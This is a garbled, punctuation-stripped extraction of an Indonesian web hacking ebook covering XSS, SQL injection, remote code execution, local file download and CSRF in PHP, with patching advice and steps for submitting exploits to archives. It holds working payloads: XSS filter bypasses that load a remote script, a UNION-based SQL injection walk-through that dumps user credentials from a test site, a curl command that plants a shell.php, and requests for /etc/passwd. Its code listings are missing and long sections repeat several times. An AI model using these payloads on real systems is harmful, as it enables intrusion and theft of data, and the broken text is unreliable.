Beda jauh bukan dengan kode diatas tadi Karena beda framework beda kodenya tetapicelahnya tetap sama yaitu tidak adanya filter
Persistent Stored
Tidak jauh beda dengan Non Persistent Celahnya masih terdapat pada parameter
0x02 - Cross Site Scripting
Injeksi Cross Site ScriptingUntuk melakukan injeksi terhadap Cross Site Scripting kita harus memasukan kode injeksipada parameter yang terjadi pada celah ini
Non Persistenthttp127001profilephpname=[Script]
Untuk melakukan injeksi kita akan memasukan kode injeksi pada parameter name
http127001profilephpname=ltscriptgtalert(ldquoXSSrdquo)ltscriptgt
Pada contoh diatas celah ini terdapat pada file profilephp dan pada parameter nameJika kita telah melakukan injeksi terhadap parameter tersebut maka kode akan berubah
Persistent Stored
Dilihat pada gambar diatas untuk menginjeksi celah ini kita memasukan kode injeksi padasebuah form text lalu melakukan submit
0x02 - Cross Site Scripting
Injeksi Cross Site Scripting dengan BypassJika dengan teknik biasa gagal atau terdapat filter terhadap kode kita dapatmenggunakan bypass
Form Searchhttp127001searchphptext=rdquogtltscriptgtalert(ldquoXSSrdquo)ltscriptgtMenambahkan tanda kutip ldquo dan gt untuk melakukan bypass
Image XSShttp127001profilephptxt=ltimg src=javascriptalert(XSS)gtMemanfaatkan kode image untuk melakukan injeksi jika kode yang lainnya di filter
Remote Scripthttp127001profilephpuser=ltscriptsrc=httphackersorgxssjsgtltscriptgtJika fungsi alert documentwrite dan yang lainnya di filter bisa menggunakan RemoteScript iniKode injeksi diisikan pada httphackersorgxssjs
Masih banyak lagi teknik untuk bypass Cross Site Scripting ini jika ingin membaca lebihlanjut silahkan baca di httpswwwowasporgindexphpXSS_Filter_Evasion_Cheat_Sheet
0x02 - Cross Site Scripting
Menutup Celah Cross Site ScriptingUntuk menutup celah ini kita dapat menggunakan fungsi php htmlspecialchars
Non Persistent
Menambahkan fungsi php htmlspecialchars pada parameter name
Persistent Stored
Kode diatas adalah contoh menutupi celah Cross Site Scripting jika kode html terdapatdidalam database dengan menambahkan htmlspecialchars pada kode yangmenampilkan hasil dari load di database
0x03 - SQL Injection
Apa itu SQL InjectionSQL Injection merupakan sebuah teknik dimana seorang penyerang dapat memasukkanperintah-perintah SQL melalui url untuk dieksekusi oleh database Dengan teknikiniseorang penyerang bisa mendapatkan data pada web target
0x03 - SQL Injection
Kode yang Menimbulkan CelahSQL Injection dapat terjadi karena kesalahan dalam sebuah kode query dan tidak adanyafilter terhadap kode injeksi seperti tanda ldquo + order+bydan lain-lain Berikut kode yangdapat menimbulkan celah ini
Jika kita memasukkan injeksi pada parameter id maka akan membuat query SQL padakode diatas berubah
Mengapa bisa berubah
Contoh Jika kita memasukkan kode injeksi pada parameter idhttp127001postphpid=1rsquo+order+by+1rsquo
Query SQL diatas akan berubah menjadi
Maka akan menyebabkan error atau vulnerability pada query SQL
0x03 - SQL Injection
Injeksi SQL InjectionUntuk melakukan injeksi terhadap SQL Injection kita harus memasukan query sql padaparameter yang terjadi pada celah ini Dalam perintah SQL ada dua tipe injeksi yaitustring dan integer String yaitu menggunakan spasi antara url dan query SQL sedangkanInteger menggunakan simbol-simbol seperti +
http127001postphpid=[Query]
Contoh melakukan injeksi SQL terhadap webTarget httptestphpvulnwebcomlistproductsphpcat=
Menghitung Jumlah TablesKita akan memasukkan query sql untuk menghitung jumlah tablesDalam menghitung tables kita akan menggunakan query order+by+jumlah dan harusmendapatkan pesan errorhttptestphpvulnwebcomlistproductsphpcat=1+order+by+1--httptestphpvulnwebcomlistproductsphpcat=1+order+by+2--httptestphpvulnwebcomlistproductsphpcat=1+order+by+3--Query diatas tidak mengakibatkan error sekarang kita coba ganti angka menjadi 12httptestphpvulnwebcomlistproductsphpcat=1+order+by+12--
Muncul pesan error pada pencarian tables ini angka 12 tadi kita kurang 1 (12 - 1 = 11)maka menjadi 11 itu berarti tables yang ada pada web ada 11
0x03 - SQL Injection
Injeksi SQL Injection
Melihat TablesKita akan memasukkan query sql untuk melihat tables yang adaDalam melihat tables kita akan menggunakan query group_concat(table_name) dan+from+information_schematables+where+table_schema=database()
httptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(table_name)891011+from+information_schematables+where+table_schema=database()
Maka akan muncul tables yang ada
Tables 1 Artists2 Carts3 Categ4 Featured5 Guestbook6 Pictures7 Products8 Users
0x03 - SQL Injection
Injeksi SQL Injection
Melihat ColumnKita akan memasukkan query sql untuk melihat column yang adaDalam melihat column kita akan menggunakan query group_concat(column_name)dan+from+information_schemacolumns+where+table_name=CHAR(Table_Decimal)
Sebelum melihat column kita harus merubah nama tables dari string menjadi decimalPada kali ini penulis menggunakan tables usersString users gt Decimal 117115101114115
httptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(column_name)891011+from+information_schemacolumns+where+table_name=CHAR(117115101114115)--
Maka akan muncul column yang ada
Column 1 Uname 7 Phone2 Pass 8 Cart3 Cc4 Address5 Email6 Name
0x03 - SQL Injection
Injeksi SQL Injection
Melihat Data dari ColumnKita akan memasukkan query sql untuk melihat data pada column yang adaDalam melihat data column kita akan menggunakan group_concat(nama_column) dan+from+[nama_table]--
Pada kali ini kita akan melihat data pada tables users dan pada column uname amp passhttptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(uname0x3apass)891011+from+users--
Maka akan muncul data pada column tersebut
Data Column Uname testPass test
0x03 - SQL Injection
Menutup Celah SQL InjectionUntuk menutup celah ini kita dapat menggunakan fungsi mysql_real_escape_stringpada parameter untuk melakukan filterasi
Menambahkan fungsi mysql_real_escape_string pada parameter id
Dengan fungsi diatas kode injeksi seperti 1rsquo+order+by+1 akan diabaikan oleh query
0x04 - Remote Code Execution
Apa itu Remote Code ExecutionRemote Command Execution adalah sebuah celah yang membuat kita terhubung padasebuah command atau terminal sistem operasi server atau hosting web tersebut Dengancelah ini kita dapat menggunakan perintah-perintah yang ada pada sistem operasi servertersebut
0x04 - Remote Code Execution
Kode yang Menimbulkan CelahRemote Code Execution dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya filter terhadap kode injeksi yang berbahaya seperti wget curl cat dan lain-lainBerikut kode yang dapat menimbulkan celah ini
Kode diatas akan menjalankan perintah dan memunculkan output(hasil dari kerja perintah)dari parameter cmd
Namun selain kode diatas ada juga kode seperti ini yang dapat menimbulakan celah
Kode diatas akan menjalankan perintah atau mengeksekusi perintah tanpa mengeluarkanoutput dari parameter cmd namun perintah tetap berjalan atau dieksekusi
0x04 - Remote Code Execution
Injeksi Remote Code ExecutionUntuk melakukan injeksi terhadap Remote Code Execution kita harus memasukan kodeinjeksi atau perintah sistem operasi (operating system) pada parameter yang ada padacelah ini
http127001cmdphpcmd=[Perintah]
Pada celah ini kita dapat menggunakan perintah sistem operasi tetapi tergantung dariserver jika server menggunakan sistem operasi windows maka perintah yang digunakanadalah perintah di windows begitu juga dengan server yang menggunakan sistem operasilinux maka akan menggunakan perintah linux
Contoh perintah untuk download file dari server lain dan menyimpannya di web targethttp127001cmdphpcmd=curl -o httpgooglecomshellphp
Perintah diatas menggunakan cURL untuk download file dari server lain
Namun bukan hanya itu saja masih banyak yang dapat dilakukan melalui celah ini antaralain1 Membuat File2 Menghapus File3 Mengcopy File4 Mengedit File5 Melihat File etcpasswd
Dan masih banyak lagi
0x04 - Remote Code Execution
Menutup Celah Remote Code ExecutionUntuk menutup celah ini kita dapat menggunakan if switch case pada kode php
Pada kode diatas kita membatasi penggunaan perintah jadi hanya perintah yang telahkita tentukan saja yang dapat berfungsi seperti perintah netstat dan ifconfig
0x05 - Local File Download
Apa itu Local File DownloadLocal File Download merupakan sebuah teknik dimana seorang penyerang dapatmendownload file-file yang ada pada web target
0x05 - Local File Download
Kode yang Menimbulkan CelahLocal File Download dapat terjadi karena kesalahan dalam sebuah kode dan tidak ada filterdalam mendownload file
Contoh kode
Kode diatas akan mendownload file yang di input dari parameter file
Selain kode diatas ada juga kode yang menimbulkan celah seperti kode dibawah ini
Kode diatas akan mendownload file yang di input dari parameter downloadfile
0x05 - Local File Download
Injeksi Local File DownloadUntuk melakukan injeksi terhadap Local File Download kita hanya perlu memasukkannama file yang ingin di download
http127001filephpdownload=[File]
Contoh InjeksiJika kita ingin mendownload file configurationphp dari sebuah web
http127001filephpdownload=configurationphp
Namun kita bukan hanya bisa download file yang ada didalam web tetapi didalam serverjuga bisa
Contoh InjeksiJika kita ingin mendownload file etcpasswd untuk melihat users yang ada pada server
http127001filephpdownload=etcpasswd
0x05 - Local File Download
Menutup Celah Local File DownloadUntuk menutup celah Local File Download kita dapat menggunakan fungsi if strpos padakode php
Kode diatas akan membatasi atau filter kode injeksi seperti etcpasswd danconfigurationphp pada parameter file
0x06 - Cross Site Request Forgery
Apa itu Cross Site Request ForgeryCross Site Request Forgery merupakan teknik pemalsuan permintaan yang berasal darihalaman web atau situs yang berbeda Cross Site Request Forgery biasanya terjadi padahalaman admin sebuah web
0x06 - Cross Site Request Forgery
Kode yang Menimbulkan CelahCross Site Request Forgery dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya session dalam sebuah kode
Contoh Misalkan terjadi pada file administratorpostphp dan file tersebut berisi kode sepertidibawah ini
Kode diatas dapat melakukan penambahan data pada database Terlihat jelas bahwa userbiasa dapat menambahkan data jika user tersebut mengetahui parameter post karenatidak adanya sebuah session
0x06 - Cross Site Request Forgery
Injeksi Cross Site Request ForgeryUntuk melakukan injeksi terhadap Cross Site Request Forgery kita harus memasukankode injeksi dan membutuhkan sebuah kode dan mengetahui parameter pada web target
Kode Exploit Cross Site Request ForgeryPada celah ini kita membutuhkan sebuah kode untuk melakukan injeksi
Contoh Jika Cross Site Request Forgery terjadi pada httpgooglecomadministratorpostphpdan terdapat pada parameter post dan name
Berikut isi kode dari httpgooglecomadministratorpostphp
Jadi kita akan membuat sebuah kode yang melakukan penyerangan ke parameter postdan name
Berikut contoh kode
Kode tersebut akan menjadi seperti ini
Lalu tinggal melakukan submit pada data yang telah di input pada form text tersebut
0x06 - Cross Site Request Forgery
Menutup Celah Cross Site Request ForgeryUntuk menutup celah ini kita hanya perlu menambahkan session pada kode php
Contoh kode
Dari kode diatas kita menambahkan fungsi session_start() dan $_SESSION pada kodeKode tersebut berfungsi untuk melakukan pemeriksaan session Jika username bukanadmin maka posting gagal
0x07 - Mengarsipkan Exploit
Membuat Keterangan Exploit untuk DikirimSetelah kita selesai menganalisis kode dan menemukan sebuah celah (vulnerability) padasuatu Content Management System (CMS) kini saatnya kita membuat keteranganmengenai exploit kita untuk diarsipkan ke beberapa exploit archive seperti 1337dayExploit-DB dan Packet Storm Security
Dalam membuat exploit kita harus memberikan keterangan seperti Title Author DateFound Version Category Vendor Tested on Vulnerability dan POC
0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim
Contoh Keterangan ExploitBerikut adalah contoh dalam membuat keterangan exploit
Dalam membuat keterangan exploit jangan lupa memberikan keterangan POC yangsangat jelas
0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom
Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya
Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini
Terima kasih kepada
0x02 - Cross Site Scripting
Kode yang Menimbulkan CelahCross Site Scripting dapat terjadi karena kesalahan dalam sebuah kode dan tidak adanyafilter terhadap kode injeksi Berikut kode yang dapat menimbulkan celah ini
Non Persistent
Jika kita memasukkan parameter xss dan memasukkan kode injeksi html maka akanditampilkan kedalam web
Namun karena pada suatu web itu berbeda kodenya maka bukan hanya seperti itu sajakode yang dapat menimbulkan celah ini Contoh pada CMS MyBB 18
Beda jauh bukan dengan kode diatas tadi Karena beda framework beda kodenya tetapicelahnya tetap sama yaitu tidak adanya filter
Persistent Stored
Tidak jauh beda dengan Non Persistent Celahnya masih terdapat pada parameter
0x02 - Cross Site Scripting
Injeksi Cross Site ScriptingUntuk melakukan injeksi terhadap Cross Site Scripting kita harus memasukan kode injeksipada parameter yang terjadi pada celah ini
Non Persistenthttp127001profilephpname=[Script]
Untuk melakukan injeksi kita akan memasukan kode injeksi pada parameter name
http127001profilephpname=ltscriptgtalert(ldquoXSSrdquo)ltscriptgt
Pada contoh diatas celah ini terdapat pada file profilephp dan pada parameter nameJika kita telah melakukan injeksi terhadap parameter tersebut maka kode akan berubah
Persistent Stored
Dilihat pada gambar diatas untuk menginjeksi celah ini kita memasukan kode injeksi padasebuah form text lalu melakukan submit
0x02 - Cross Site Scripting
Injeksi Cross Site Scripting dengan BypassJika dengan teknik biasa gagal atau terdapat filter terhadap kode kita dapatmenggunakan bypass
Form Searchhttp127001searchphptext=rdquogtltscriptgtalert(ldquoXSSrdquo)ltscriptgtMenambahkan tanda kutip ldquo dan gt untuk melakukan bypass
Image XSShttp127001profilephptxt=ltimg src=javascriptalert(XSS)gtMemanfaatkan kode image untuk melakukan injeksi jika kode yang lainnya di filter
Remote Scripthttp127001profilephpuser=ltscriptsrc=httphackersorgxssjsgtltscriptgtJika fungsi alert documentwrite dan yang lainnya di filter bisa menggunakan RemoteScript iniKode injeksi diisikan pada httphackersorgxssjs
Masih banyak lagi teknik untuk bypass Cross Site Scripting ini jika ingin membaca lebihlanjut silahkan baca di httpswwwowasporgindexphpXSS_Filter_Evasion_Cheat_Sheet
0x02 - Cross Site Scripting
Menutup Celah Cross Site ScriptingUntuk menutup celah ini kita dapat menggunakan fungsi php htmlspecialchars
Non Persistent
Menambahkan fungsi php htmlspecialchars pada parameter name
Persistent Stored
Kode diatas adalah contoh menutupi celah Cross Site Scripting jika kode html terdapatdidalam database dengan menambahkan htmlspecialchars pada kode yangmenampilkan hasil dari load di database
0x03 - SQL Injection
Apa itu SQL InjectionSQL Injection merupakan sebuah teknik dimana seorang penyerang dapat memasukkanperintah-perintah SQL melalui url untuk dieksekusi oleh database Dengan teknikiniseorang penyerang bisa mendapatkan data pada web target
0x03 - SQL Injection
Kode yang Menimbulkan CelahSQL Injection dapat terjadi karena kesalahan dalam sebuah kode query dan tidak adanyafilter terhadap kode injeksi seperti tanda ldquo + order+bydan lain-lain Berikut kode yangdapat menimbulkan celah ini
Jika kita memasukkan injeksi pada parameter id maka akan membuat query SQL padakode diatas berubah
Mengapa bisa berubah
Contoh Jika kita memasukkan kode injeksi pada parameter idhttp127001postphpid=1rsquo+order+by+1rsquo
Query SQL diatas akan berubah menjadi
Maka akan menyebabkan error atau vulnerability pada query SQL
0x03 - SQL Injection
Injeksi SQL InjectionUntuk melakukan injeksi terhadap SQL Injection kita harus memasukan query sql padaparameter yang terjadi pada celah ini Dalam perintah SQL ada dua tipe injeksi yaitustring dan integer String yaitu menggunakan spasi antara url dan query SQL sedangkanInteger menggunakan simbol-simbol seperti +
http127001postphpid=[Query]
Contoh melakukan injeksi SQL terhadap webTarget httptestphpvulnwebcomlistproductsphpcat=
Menghitung Jumlah TablesKita akan memasukkan query sql untuk menghitung jumlah tablesDalam menghitung tables kita akan menggunakan query order+by+jumlah dan harusmendapatkan pesan errorhttptestphpvulnwebcomlistproductsphpcat=1+order+by+1--httptestphpvulnwebcomlistproductsphpcat=1+order+by+2--httptestphpvulnwebcomlistproductsphpcat=1+order+by+3--Query diatas tidak mengakibatkan error sekarang kita coba ganti angka menjadi 12httptestphpvulnwebcomlistproductsphpcat=1+order+by+12--
Muncul pesan error pada pencarian tables ini angka 12 tadi kita kurang 1 (12 - 1 = 11)maka menjadi 11 itu berarti tables yang ada pada web ada 11
0x03 - SQL Injection
Injeksi SQL Injection
Melihat TablesKita akan memasukkan query sql untuk melihat tables yang adaDalam melihat tables kita akan menggunakan query group_concat(table_name) dan+from+information_schematables+where+table_schema=database()
httptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(table_name)891011+from+information_schematables+where+table_schema=database()
Maka akan muncul tables yang ada
Tables 1 Artists2 Carts3 Categ4 Featured5 Guestbook6 Pictures7 Products8 Users
0x03 - SQL Injection
Injeksi SQL Injection
Melihat ColumnKita akan memasukkan query sql untuk melihat column yang adaDalam melihat column kita akan menggunakan query group_concat(column_name)dan+from+information_schemacolumns+where+table_name=CHAR(Table_Decimal)
Sebelum melihat column kita harus merubah nama tables dari string menjadi decimalPada kali ini penulis menggunakan tables usersString users gt Decimal 117115101114115
httptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(column_name)891011+from+information_schemacolumns+where+table_name=CHAR(117115101114115)--
Maka akan muncul column yang ada
Column 1 Uname 7 Phone2 Pass 8 Cart3 Cc4 Address5 Email6 Name
0x03 - SQL Injection
Injeksi SQL Injection
Melihat Data dari ColumnKita akan memasukkan query sql untuk melihat data pada column yang adaDalam melihat data column kita akan menggunakan group_concat(nama_column) dan+from+[nama_table]--
Pada kali ini kita akan melihat data pada tables users dan pada column uname amp passhttptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(uname0x3apass)891011+from+users--
Maka akan muncul data pada column tersebut
Data Column Uname testPass test
0x03 - SQL Injection
Menutup Celah SQL InjectionUntuk menutup celah ini kita dapat menggunakan fungsi mysql_real_escape_stringpada parameter untuk melakukan filterasi
Menambahkan fungsi mysql_real_escape_string pada parameter id
Dengan fungsi diatas kode injeksi seperti 1rsquo+order+by+1 akan diabaikan oleh query
0x04 - Remote Code Execution
Apa itu Remote Code ExecutionRemote Command Execution adalah sebuah celah yang membuat kita terhubung padasebuah command atau terminal sistem operasi server atau hosting web tersebut Dengancelah ini kita dapat menggunakan perintah-perintah yang ada pada sistem operasi servertersebut
0x04 - Remote Code Execution
Kode yang Menimbulkan CelahRemote Code Execution dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya filter terhadap kode injeksi yang berbahaya seperti wget curl cat dan lain-lainBerikut kode yang dapat menimbulkan celah ini
Kode diatas akan menjalankan perintah dan memunculkan output(hasil dari kerja perintah)dari parameter cmd
Namun selain kode diatas ada juga kode seperti ini yang dapat menimbulakan celah
Kode diatas akan menjalankan perintah atau mengeksekusi perintah tanpa mengeluarkanoutput dari parameter cmd namun perintah tetap berjalan atau dieksekusi
0x04 - Remote Code Execution
Injeksi Remote Code ExecutionUntuk melakukan injeksi terhadap Remote Code Execution kita harus memasukan kodeinjeksi atau perintah sistem operasi (operating system) pada parameter yang ada padacelah ini
http127001cmdphpcmd=[Perintah]
Pada celah ini kita dapat menggunakan perintah sistem operasi tetapi tergantung dariserver jika server menggunakan sistem operasi windows maka perintah yang digunakanadalah perintah di windows begitu juga dengan server yang menggunakan sistem operasilinux maka akan menggunakan perintah linux
Contoh perintah untuk download file dari server lain dan menyimpannya di web targethttp127001cmdphpcmd=curl -o httpgooglecomshellphp
Perintah diatas menggunakan cURL untuk download file dari server lain
Namun bukan hanya itu saja masih banyak yang dapat dilakukan melalui celah ini antaralain1 Membuat File2 Menghapus File3 Mengcopy File4 Mengedit File5 Melihat File etcpasswd
Dan masih banyak lagi
0x04 - Remote Code Execution
Menutup Celah Remote Code ExecutionUntuk menutup celah ini kita dapat menggunakan if switch case pada kode php
Pada kode diatas kita membatasi penggunaan perintah jadi hanya perintah yang telahkita tentukan saja yang dapat berfungsi seperti perintah netstat dan ifconfig
0x05 - Local File Download
Apa itu Local File DownloadLocal File Download merupakan sebuah teknik dimana seorang penyerang dapatmendownload file-file yang ada pada web target
0x05 - Local File Download
Kode yang Menimbulkan CelahLocal File Download dapat terjadi karena kesalahan dalam sebuah kode dan tidak ada filterdalam mendownload file
Contoh kode
Kode diatas akan mendownload file yang di input dari parameter file
Selain kode diatas ada juga kode yang menimbulkan celah seperti kode dibawah ini
Kode diatas akan mendownload file yang di input dari parameter downloadfile
0x05 - Local File Download
Injeksi Local File DownloadUntuk melakukan injeksi terhadap Local File Download kita hanya perlu memasukkannama file yang ingin di download
http127001filephpdownload=[File]
Contoh InjeksiJika kita ingin mendownload file configurationphp dari sebuah web
http127001filephpdownload=configurationphp
Namun kita bukan hanya bisa download file yang ada didalam web tetapi didalam serverjuga bisa
Contoh InjeksiJika kita ingin mendownload file etcpasswd untuk melihat users yang ada pada server
http127001filephpdownload=etcpasswd
0x05 - Local File Download
Menutup Celah Local File DownloadUntuk menutup celah Local File Download kita dapat menggunakan fungsi if strpos padakode php
Kode diatas akan membatasi atau filter kode injeksi seperti etcpasswd danconfigurationphp pada parameter file
0x06 - Cross Site Request Forgery
Apa itu Cross Site Request ForgeryCross Site Request Forgery merupakan teknik pemalsuan permintaan yang berasal darihalaman web atau situs yang berbeda Cross Site Request Forgery biasanya terjadi padahalaman admin sebuah web
0x06 - Cross Site Request Forgery
Kode yang Menimbulkan CelahCross Site Request Forgery dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya session dalam sebuah kode
Contoh Misalkan terjadi pada file administratorpostphp dan file tersebut berisi kode sepertidibawah ini
Kode diatas dapat melakukan penambahan data pada database Terlihat jelas bahwa userbiasa dapat menambahkan data jika user tersebut mengetahui parameter post karenatidak adanya sebuah session
0x06 - Cross Site Request Forgery
Injeksi Cross Site Request ForgeryUntuk melakukan injeksi terhadap Cross Site Request Forgery kita harus memasukankode injeksi dan membutuhkan sebuah kode dan mengetahui parameter pada web target
Kode Exploit Cross Site Request ForgeryPada celah ini kita membutuhkan sebuah kode untuk melakukan injeksi
Contoh Jika Cross Site Request Forgery terjadi pada httpgooglecomadministratorpostphpdan terdapat pada parameter post dan name
Berikut isi kode dari httpgooglecomadministratorpostphp
Jadi kita akan membuat sebuah kode yang melakukan penyerangan ke parameter postdan name
Berikut contoh kode
Kode tersebut akan menjadi seperti ini
Lalu tinggal melakukan submit pada data yang telah di input pada form text tersebut
0x06 - Cross Site Request Forgery
Menutup Celah Cross Site Request ForgeryUntuk menutup celah ini kita hanya perlu menambahkan session pada kode php
Contoh kode
Dari kode diatas kita menambahkan fungsi session_start() dan $_SESSION pada kodeKode tersebut berfungsi untuk melakukan pemeriksaan session Jika username bukanadmin maka posting gagal
0x07 - Mengarsipkan Exploit
Membuat Keterangan Exploit untuk DikirimSetelah kita selesai menganalisis kode dan menemukan sebuah celah (vulnerability) padasuatu Content Management System (CMS) kini saatnya kita membuat keteranganmengenai exploit kita untuk diarsipkan ke beberapa exploit archive seperti 1337dayExploit-DB dan Packet Storm Security
Dalam membuat exploit kita harus memberikan keterangan seperti Title Author DateFound Version Category Vendor Tested on Vulnerability dan POC
0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim
Contoh Keterangan ExploitBerikut adalah contoh dalam membuat keterangan exploit
Dalam membuat keterangan exploit jangan lupa memberikan keterangan POC yangsangat jelas
0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom
Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya
Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini
Terima kasih kepada
0x02 - Cross Site Scripting
Injeksi Cross Site ScriptingUntuk melakukan injeksi terhadap Cross Site Scripting kita harus memasukan kode injeksipada parameter yang terjadi pada celah ini
Non Persistenthttp127001profilephpname=[Script]
Untuk melakukan injeksi kita akan memasukan kode injeksi pada parameter name
http127001profilephpname=ltscriptgtalert(ldquoXSSrdquo)ltscriptgt
Pada contoh diatas celah ini terdapat pada file profilephp dan pada parameter nameJika kita telah melakukan injeksi terhadap parameter tersebut maka kode akan berubah
Persistent Stored
Dilihat pada gambar diatas untuk menginjeksi celah ini kita memasukan kode injeksi padasebuah form text lalu melakukan submit
0x02 - Cross Site Scripting
Injeksi Cross Site Scripting dengan BypassJika dengan teknik biasa gagal atau terdapat filter terhadap kode kita dapatmenggunakan bypass
Form Searchhttp127001searchphptext=rdquogtltscriptgtalert(ldquoXSSrdquo)ltscriptgtMenambahkan tanda kutip ldquo dan gt untuk melakukan bypass
Image XSShttp127001profilephptxt=ltimg src=javascriptalert(XSS)gtMemanfaatkan kode image untuk melakukan injeksi jika kode yang lainnya di filter
Remote Scripthttp127001profilephpuser=ltscriptsrc=httphackersorgxssjsgtltscriptgtJika fungsi alert documentwrite dan yang lainnya di filter bisa menggunakan RemoteScript iniKode injeksi diisikan pada httphackersorgxssjs
Masih banyak lagi teknik untuk bypass Cross Site Scripting ini jika ingin membaca lebihlanjut silahkan baca di httpswwwowasporgindexphpXSS_Filter_Evasion_Cheat_Sheet
0x02 - Cross Site Scripting
Menutup Celah Cross Site ScriptingUntuk menutup celah ini kita dapat menggunakan fungsi php htmlspecialchars
Non Persistent
Menambahkan fungsi php htmlspecialchars pada parameter name
Persistent Stored
Kode diatas adalah contoh menutupi celah Cross Site Scripting jika kode html terdapatdidalam database dengan menambahkan htmlspecialchars pada kode yangmenampilkan hasil dari load di database
0x03 - SQL Injection
Apa itu SQL InjectionSQL Injection merupakan sebuah teknik dimana seorang penyerang dapat memasukkanperintah-perintah SQL melalui url untuk dieksekusi oleh database Dengan teknikiniseorang penyerang bisa mendapatkan data pada web target
0x03 - SQL Injection
Kode yang Menimbulkan CelahSQL Injection dapat terjadi karena kesalahan dalam sebuah kode query dan tidak adanyafilter terhadap kode injeksi seperti tanda ldquo + order+bydan lain-lain Berikut kode yangdapat menimbulkan celah ini
Jika kita memasukkan injeksi pada parameter id maka akan membuat query SQL padakode diatas berubah
Mengapa bisa berubah
Contoh Jika kita memasukkan kode injeksi pada parameter idhttp127001postphpid=1rsquo+order+by+1rsquo
Query SQL diatas akan berubah menjadi
Maka akan menyebabkan error atau vulnerability pada query SQL
0x03 - SQL Injection
Injeksi SQL InjectionUntuk melakukan injeksi terhadap SQL Injection kita harus memasukan query sql padaparameter yang terjadi pada celah ini Dalam perintah SQL ada dua tipe injeksi yaitustring dan integer String yaitu menggunakan spasi antara url dan query SQL sedangkanInteger menggunakan simbol-simbol seperti +
http127001postphpid=[Query]
Contoh melakukan injeksi SQL terhadap webTarget httptestphpvulnwebcomlistproductsphpcat=
Menghitung Jumlah TablesKita akan memasukkan query sql untuk menghitung jumlah tablesDalam menghitung tables kita akan menggunakan query order+by+jumlah dan harusmendapatkan pesan errorhttptestphpvulnwebcomlistproductsphpcat=1+order+by+1--httptestphpvulnwebcomlistproductsphpcat=1+order+by+2--httptestphpvulnwebcomlistproductsphpcat=1+order+by+3--Query diatas tidak mengakibatkan error sekarang kita coba ganti angka menjadi 12httptestphpvulnwebcomlistproductsphpcat=1+order+by+12--
Muncul pesan error pada pencarian tables ini angka 12 tadi kita kurang 1 (12 - 1 = 11)maka menjadi 11 itu berarti tables yang ada pada web ada 11
0x03 - SQL Injection
Injeksi SQL Injection
Melihat TablesKita akan memasukkan query sql untuk melihat tables yang adaDalam melihat tables kita akan menggunakan query group_concat(table_name) dan+from+information_schematables+where+table_schema=database()
httptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(table_name)891011+from+information_schematables+where+table_schema=database()
Maka akan muncul tables yang ada
Tables 1 Artists2 Carts3 Categ4 Featured5 Guestbook6 Pictures7 Products8 Users
0x03 - SQL Injection
Injeksi SQL Injection
Melihat ColumnKita akan memasukkan query sql untuk melihat column yang adaDalam melihat column kita akan menggunakan query group_concat(column_name)dan+from+information_schemacolumns+where+table_name=CHAR(Table_Decimal)
Sebelum melihat column kita harus merubah nama tables dari string menjadi decimalPada kali ini penulis menggunakan tables usersString users gt Decimal 117115101114115
httptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(column_name)891011+from+information_schemacolumns+where+table_name=CHAR(117115101114115)--
Maka akan muncul column yang ada
Column 1 Uname 7 Phone2 Pass 8 Cart3 Cc4 Address5 Email6 Name
0x03 - SQL Injection
Injeksi SQL Injection
Melihat Data dari ColumnKita akan memasukkan query sql untuk melihat data pada column yang adaDalam melihat data column kita akan menggunakan group_concat(nama_column) dan+from+[nama_table]--
Pada kali ini kita akan melihat data pada tables users dan pada column uname amp passhttptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(uname0x3apass)891011+from+users--
Maka akan muncul data pada column tersebut
Data Column Uname testPass test
0x03 - SQL Injection
Menutup Celah SQL InjectionUntuk menutup celah ini kita dapat menggunakan fungsi mysql_real_escape_stringpada parameter untuk melakukan filterasi
Menambahkan fungsi mysql_real_escape_string pada parameter id
Dengan fungsi diatas kode injeksi seperti 1rsquo+order+by+1 akan diabaikan oleh query
0x04 - Remote Code Execution
